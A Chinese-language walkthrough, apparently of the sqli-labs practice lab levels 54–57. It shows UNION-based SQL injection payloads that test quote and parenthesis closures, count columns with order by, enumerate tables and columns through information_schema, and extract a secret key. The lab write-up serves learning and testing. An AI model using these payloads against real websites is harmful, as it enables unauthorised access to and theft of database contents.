第五十四关
联合查询注入。
1.png
十次查到key,数据在challenges库里,每次重置挑战次数会随机产生表名列名。
第一次:?id=1' 报错
第二次:?id=1” 正常
第三次:1' order by 4 --+ 报错
第四次:1' order by 3 --+ 正常
第五次:
?id=1.1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges'--+
表名:7rpupwfukg
第六次:
?id=1.1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='7rpupwfukg'--+
列名:id,sessid,secret_MV6W,tryy
第七次:
?id=1.1' union select 1,group_concat(secret_MV6W),group_concat(tryy) from challenges.7rpupwfukg--+
secret_MV6W:HCnxka8uqCKsAl9NMUF5wTaj
这里只用了七次(在没有拼写错误或低级错误的情况下)就可以查到key,当然只是理想情况,因为我事先知道order by 3,如果在不知道字段数的情况下还要多浪费几次机会。
第五十五关
整数型,括号闭合
?id=1.1) union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges' --+
第五十六关
单引号括号闭合
?id=1.1’) union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges' --+
第五十七关
双引号闭合
?id=1.1" union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges' --+
网友评论